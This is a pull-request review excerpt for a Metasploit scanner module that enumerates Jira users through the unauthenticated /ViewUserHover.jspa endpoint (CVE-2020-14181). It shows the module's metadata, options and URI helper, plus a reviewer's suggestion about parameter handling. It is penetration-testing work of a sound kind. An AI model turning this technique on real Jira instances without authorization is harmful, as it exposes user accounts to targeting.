modules/auxiliary/scanner/http/jira_user_enum.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jira Users Enumeration',
+        'Description' => %q{
+          This module exploits an information disclosure vulnerability that allows an
+          unauthenticated user to enumerate users in the /ViewUserHover.jspa endpoint.
+          This only affects Jira versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
+          Discovered by Mikhail Klyuchnikov @__mn1__
+          This module was only tested on 8.4.1
+        },
+        'Author' => [ 'Brian Halbach' ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['URL', 'https://jira.atlassian.com/browse/JRASERVER-71560'],
+            ['CVE', '2020-14181'],
+          ],
+        'DisclosureDate' => '2020-08-16'
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Jira Path', '/']),
+      ]
+    )
+    deregister_options('PASS_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'STOP_ON_SUCCESS', 'BLANK_PASSWORDS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'PASSWORD')
+  end
+
+  def base_uri
+    @base_uri ||= normalize_uri("#{target_uri.path}/secure/ViewUserHover.jspa?username=")
```

Comment:
I think the URI should not contain the URL parameter. `vars_gets` option should be used in `send_request_cgi!` instead (see my other comment).
```suggestion
    @base_uri ||= normalize_uri("#{target_uri.path}/secure/ViewUserHover.jspa")
```